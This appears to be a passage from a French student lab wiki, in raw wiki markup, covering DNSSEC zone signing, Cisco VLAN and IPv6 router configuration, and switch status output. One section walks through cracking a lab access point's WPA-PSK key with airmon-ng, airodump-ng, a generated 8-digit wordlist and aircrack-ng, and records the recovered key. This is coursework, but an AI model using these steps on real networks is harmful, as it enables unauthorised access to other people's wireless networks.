  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
